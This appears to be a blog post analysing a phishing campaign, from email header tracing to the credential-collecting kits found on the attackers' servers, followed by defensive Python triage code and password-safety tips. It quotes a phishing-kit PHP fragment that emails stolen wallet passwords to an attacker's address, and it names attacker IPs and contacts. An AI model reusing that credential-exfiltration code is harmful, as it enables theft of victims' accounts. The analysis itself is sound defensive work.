How NOT to Do Phishing Attacks (Part 2)

Apparently, my email address has ended up in some phishing database, so the article “How NOT to do phishing attacks” now gets a sequel.

I was sent another phishing email, and again, within five minutes I found a bunch of phishing sites, downloaded the phishing scripts (different ones this time) and found the passwords of the victims. So that these people's passwords do not spread any further, I will partially blur the screenshots.

So, the email:

Standard check of the mail path:

The email passed through these mail hops (taken from the Received headers):
slot0.globalpumps-com.ga (unknown [64.190.90.230]) -> sendmail8.hostland.ru (sendmail8.hostland.ru. [185.26.123.238]) -> mx.google.com -> Delivered-To: proghoster@gmail.com

The email contains:
MIME-parts in this message:
  1  text/html [] (0.4 kB)
  2 al@mi-al.ru.html text/html [attach] (5.2 kB)

I downloaded and opened the attachment, and inside is this beauty:

I really liked it; nicely done!

The form POSTs its data to the server at: https://****store.xyz/prn/koriaxls.php
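The three checks done by hand so far (the mail path from the Received headers, the MIME part listing, and the form action inside the HTML attachment) can be run in one pass over the raw message. The following is an added example and not code from the original article; the sample message inside it is constructed from the hostnames, IPs and form URL quoted above, with placeholder message ids, dates, body text and form field names, and the "no reverse DNS" flag is a heuristic of this example, not something the article states.

```python
"""Static triage of a suspicious email: hop chain, MIME parts, form targets.
Added example, not code from the original article. SAMPLE_EMAIL is constructed
to mirror the Received chain and MIME layout the article shows; message ids,
dates, body text and form field names are placeholders."""
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed sample: hostnames, IPs and form action are the values quoted in
# the article, everything else is filler.
SAMPLE_EMAIL = b"""\
Delivered-To: proghoster@gmail.com
Received: from sendmail8.hostland.ru (sendmail8.hostland.ru. [185.26.123.238])
        by mx.google.com with ESMTPS id placeholder-2;
        Mon, 1 Jan 2018 00:00:02 +0000
Received: from slot0.globalpumps-com.ga (unknown [64.190.90.230])
        by sendmail8.hostland.ru (Postfix) with ESMTPSA id placeholder-1;
        Mon, 1 Jan 2018 03:00:01 +0300
To: proghoster@gmail.com
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>Please open the attached document.</body></html>
--b1
Content-Type: text/html; name="al@mi-al.ru.html"
Content-Disposition: attachment; filename="al@mi-al.ru.html"

<html><body><form action="https://****store.xyz/prn/koriaxls.php" method="post">
<input name="email"><input name="password" type="password"></form></body></html>
--b1--
"""

# "from <helo> (<rdns> [<ip>]) ... by <host>": the format Postfix and Google use.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[^\]]+)\]\)"
    r".*?\bby\s+(?P<by>[\w.-]+)", re.IGNORECASE)


def received_chain(raw: bytes) -> list:
    """Hops oldest-first. Each MTA prepends its own Received header, so the
    header order is newest-first and has to be reversed."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        text = " ".join(str(hdr).split())  # unfold continuation lines
        m = RECEIVED_RE.search(text)
        if not m:
            hops.append({"raw": text})
            continue
        hop = m.groupdict()
        hop["rdns"] = (hop["rdns"] or "").rstrip(".")
        # "unknown": the receiving MTA could not reverse-resolve the IP,
        # typical of a throwaway sending box rather than a real mail server.
        hop["no_rdns"] = hop["rdns"] in ("", "unknown")
        hops.append(hop)
    return hops


def list_parts(raw: bytes) -> list:
    """Leaf MIME parts with type, filename, disposition, size and payload."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        parts.append({"content_type": part.get_content_type(),
                      "filename": part.get_filename(),
                      "attachment": part.get_content_disposition() == "attachment",
                      "size": len(payload), "payload": payload})
    return parts


class _FormScanner(HTMLParser):
    """Collect form actions and input names without rendering the page."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and a.get("type", "text") != "submit":
            self.fields.append(a.get("name") or "")


def form_targets(html: str) -> dict:
    scanner = _FormScanner()
    scanner.feed(html)
    return {"actions": scanner.actions, "fields": scanner.fields}


def triage(raw: bytes) -> dict:
    """The checks the article did by hand, in one pass over the raw message."""
    parts = list_parts(raw)
    exfil = [dict(filename=p["filename"], **form_targets(p["payload"].decode("utf-8", "replace")))
             for p in parts if p["attachment"] and p["content_type"] == "text/html"]
    return {"hops": received_chain(raw), "parts": parts, "exfil": exfil}
```

Calling `triage(SAMPLE_EMAIL)` gives the two hops in the order the message actually travelled (the first one flagged because the submitting host had no reverse DNS), the two text/html parts with the second marked as an attachment, and the attachment's form action together with the input names it would submit. Feed it the raw .eml of a real message instead of the sample to reproduce the checks above.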

Let's look at the https://****store.xyz/prn/ folder.

The koriaxls.php script is the one that receives data from the phishing page. And officedesk.php is this:

The author of the script messed up the HTML tags somewhere, so instead of a table you get an unreadable mess. It is easier to look at the HTML source to make out at least something:

There are several more folders at the root of the site!

As with the previous scripts, I noticed that attackers love to collect everything: IP, country, browser and more. I can't imagine why anyone needs the IP address of the user whose email password was stolen. (One common reason: logging in from a matching country and browser so that the mail provider's suspicious-sign-in checks do not fire.)

Of course, the attacker himself shows up in his own logs, from testing the script:

  • 158.69.116.60
  • 193.36.224.28
  • 193.36.224.44
  • 201.114.3.225

Let's get the list of sites hosted on the same server; we find another site ready to steal passwords:

And one more, with an archive of the scripts:

There is a page that steals passwords for some blockchain wallet:

There are the names Coded By x-Phisher and Gmail v3.0.0; I have not figured out which of them is the author and which is the name of the program:

Dull scripts. I wrote code of similar quality when I was in law school and learned PHP during the holidays. No, my code was still better! )))))

The entered credentials are sent to the attacker by email. In the code you can find the following fragment:

$email_from = 'mugu@solveblock.com';//<== update the email address
$email_subject = "FIRST BLOCK CHAIN GRABS!!";
$email_body = "FROM WALLET ID: $name.\n-------".
    "----Here is the password:\n $message-----".

$to = "codycodysr@mail.com";//<== update the email address  

mugu@solveblock.com is the sender address, i.e. it can be anything, since the script sets it itself. But codycodysr@mail.com is the recipient, so this address quite possibly belongs to the programmer of the phishing kit or to the attacker using it.
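With a kit's source in hand, the facts pulled out by hand above and earlier on this page (the drop address as opposed to the forgeable sender, the IP and browser fields the script collects, and the "Coded By" signature) can be extracted mechanically. The following is an added example, not the article's or the kit's own code: SAMPLE_KIT wraps the mailer fragment quoted above in constructed lines for the kind of IP/user-agent logging the article describes, and the $_POST field names, the final redirect and the list of variable names treated as "recipient" or "sender" are assumptions of this example.

```python
"""Pull indicators out of a phishing kit's PHP: where the stolen data goes,
what the kit collects, and who signed it.
Added example, not the article's or the kit's code. SAMPLE_KIT is constructed:
it wraps the mailer fragment quoted in the article in filler lines; the
$_POST field names, the redirect and the variable-name heuristics are
assumptions."""
import re

SAMPLE_KIT = r"""<?php
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$name = $_POST['name'];
$message = $_POST['password'];
$email_from = 'mugu@solveblock.com';//<== update the email address
$email_subject = "FIRST BLOCK CHAIN GRABS!!";
$email_body = "FROM WALLET ID: $name.\n-------".
    "----Here is the password:\n $message-----".
    "IP: $ip Browser: $browser";
$to = "codycodysr@mail.com";//<== update the email address
$headers = "From: $email_from\r\n";
mail($to, $email_subject, $email_body, $headers);
// Coded By x-Phisher
header("Location: https://example.com/");
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(['\"])(.*?)\2\s*;")  # $var = 'literal';
MAIL_CALL_RE = re.compile(r"\bmail\s*\(\s*([^,]+),")          # first arg of mail()
INPUT_RE = re.compile(r"\$_(SERVER|POST|GET|REQUEST)\[\s*['\"](\w+)['\"]\s*\]")
SIGNATURE_RE = re.compile(r"coded\s+by\s+[\w@.-]+", re.IGNORECASE)

# Variable names kits commonly use for the drop address and the spoofed
# sender (heuristic; an assumption of this example).
RECIPIENT_VARS = {"to", "recipient", "send", "email_to", "my_email"}
SENDER_VARS = {"from", "email_from", "sender"}


def extract_drop_addresses(php: str) -> dict:
    """Split every address in the file into recipient (where the stolen
    credentials go), sender (forgeable, set by the script itself) and other."""
    assigned = {name: value for name, _quote, value in ASSIGN_RE.findall(php)}

    def resolve(expr: str) -> str:
        expr = expr.strip()
        if expr.startswith("$"):          # mail($to, ...): look up $to
            return assigned.get(expr[1:], "")
        return expr.strip("'\"")

    recipients, senders = set(), set()
    for arg in MAIL_CALL_RE.findall(php):
        recipients.update(EMAIL_RE.findall(resolve(arg)))
    for name, value in assigned.items():
        if name.lower() in RECIPIENT_VARS:
            recipients.update(EMAIL_RE.findall(value))
        elif name.lower() in SENDER_VARS:
            senders.update(EMAIL_RE.findall(value))
    everything = set(EMAIL_RE.findall(php))
    return {"recipients": sorted(recipients), "senders": sorted(senders),
            "other": sorted(everything - recipients - senders)}


def collected_fields(php: str) -> dict:
    """Which request/server fields the kit reads: the form inputs it steals
    and the victim's IP, user agent and so on."""
    fields = {}
    for source, key in INPUT_RE.findall(php):
        bucket = fields.setdefault(source, [])
        if key not in bucket:
            bucket.append(key)
    return fields


def kit_signatures(php: str) -> list:
    """'Coded By ...' style author tags, handy for clustering kits."""
    return SIGNATURE_RE.findall(php)


if __name__ == "__main__":
    print(extract_drop_addresses(SAMPLE_KIT))
    print(collected_fields(SAMPLE_KIT))
    print(kit_signatures(SAMPLE_KIT))
```

Run over every .php file in a downloaded kit archive, this separates the one address that matters (the recipient of the mail() call, which the attacker has to be able to read) from the sender string, which is cosmetic. The recipient resolution follows a literal assignment only; a kit that builds the address dynamically would land in the "other" bucket for manual review.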

codycodysr@mail.com also points to Nigeria:

If you read the first part, you will remember there were Nigerian connections there too.

I went to mail.com, entered codycodysr@mail.com, clicked “I forgot my password”, and this is what the site showed me:

See the phone number +234 ******* 922? On this service you can find out which country a phone number belongs to knowing only its first digits:

This number is also Nigerian (+234 is Nigeria's country code), although it differs from the first one, +2348189234582.

Conclusion

On the one hand, the choice of victims shows that some preparation went into selecting them and sending the messages so that they would not land in the spam folder; basically these are various small online businesses. Although there are more serious targets as well:

But on the other hand, there is complete sloppiness: archives of the scripts left on the site with the drop email address inside, the stolen passwords accessible to everyone, and even the attacker's own IP addresses...

The victims are international, but the bias is still toward Russian speakers. At least one of the campaigns targeted addresses ending in .ru, including users of the @mail.ru service.

Recommendations on how to avoid becoming a victim of email theft

1. Use a strong password: long, with different types of characters, not a real word or phrase but a meaningless string of characters (a password manager can generate one for you).

2. Do not reuse the same password on different sites.

3. Change your passwords from time to time, and immediately if you suspect one has leaked.

4. Do not store your passwords in plain text files on your computer or in cloud storage. Use a password manager, or keep them on encrypted partitions or media.

5. If, after clicking a link or opening a file, you are asked to enter your email password, assume it is an attempt to steal it: a document or attachment never needs your mailbox password to open. Enabling two-factor authentication on your mailbox limits the damage if a password does leak.

6. Use only official software downloaded from official sites. Do not use cracked programs from untrusted sources; they may contain malware that steals passwords.
